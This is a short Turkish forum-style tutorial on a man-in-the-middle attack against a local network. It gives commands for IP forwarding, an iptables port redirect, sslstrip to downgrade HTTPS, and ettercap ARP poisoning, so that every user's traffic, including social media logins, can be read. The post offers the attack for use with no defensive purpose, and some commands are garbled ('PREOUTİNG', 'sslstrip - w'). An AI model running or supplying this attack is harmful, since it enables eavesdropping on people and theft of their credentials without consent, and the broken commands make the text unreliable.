Öncelikle bayram dolayısıyla memelekete geldim bilgeseyerım burda olmadığı için resim koyamıcam
Arp zehirlemeye geçelim:
Öncelikle ip yönlendirmemizi etkin hale getirmemiz gerekiyor. echo '1' >/proc/sys/net/ipv4/ip_forward
komutu ile yönlendirmeye açıyoruz emin olmak için eğer konsolacat /proc/sys/net/ipv4/ip_forward
yazdığımızda sonuç "1" ise başarılı olmuştur
Şimdi port yönlendirmesi yapmamız gerekiyor bunun için linux"un güvenlik duvarı ile yapıcaz
Kodumuz: iptables -t -A PREOUTİNG -i eth0 -p tcp --destination-port 80 -j REDİRECT --to-port 8080
konsola yazdıktan sonra artık bulunduğumuz ağ içerisinde 80 portu yani web uygulama portundan geçen paketleri 8080 portundan geçirdik
Hala bir sorunumuz var biliyosunuzki çoğu sosyal medya sitesi "https" güvenlik protokolü kullanıyor bunun içinde ağdaki https leri http ye çevirmemiz gerekiyor aksi taktirde paketleri okuyamayız.
Linuxta hali hazırda gelen sslstrip"i kullanıcağız
Kodumuz: sslstrip - w loglar.log -l 8080
Kodda sslstrip aracı https protokolinğ http"ye çeviriyp "-l" ile portumuzu "-w" ile dosya ismini belirledik.
Gelelim asıl eğlenceli olaya?
Ettercap kullanıcağız
Kodumuz:ettercap -T -q -i eth0 -M ARP /192.168.227.132 / // output:
local ip aresiniz farklı olabilir siz ona göre girin
"-i" ile arayüzümüzü seçiyoruz
"-M" ile saldırı türümüzü seçtik
"-T -q" ile arayüz tipmizi yazı olarak belirledik
bundan sonra artık ağda ne kadar kişi varsa bütün paketler http olarak konsola gelicektir.
DipNot: Birden fazla terminal açtıktan sonra eğer kapatırsanız bütün işlemler tekrardan.
Probber!!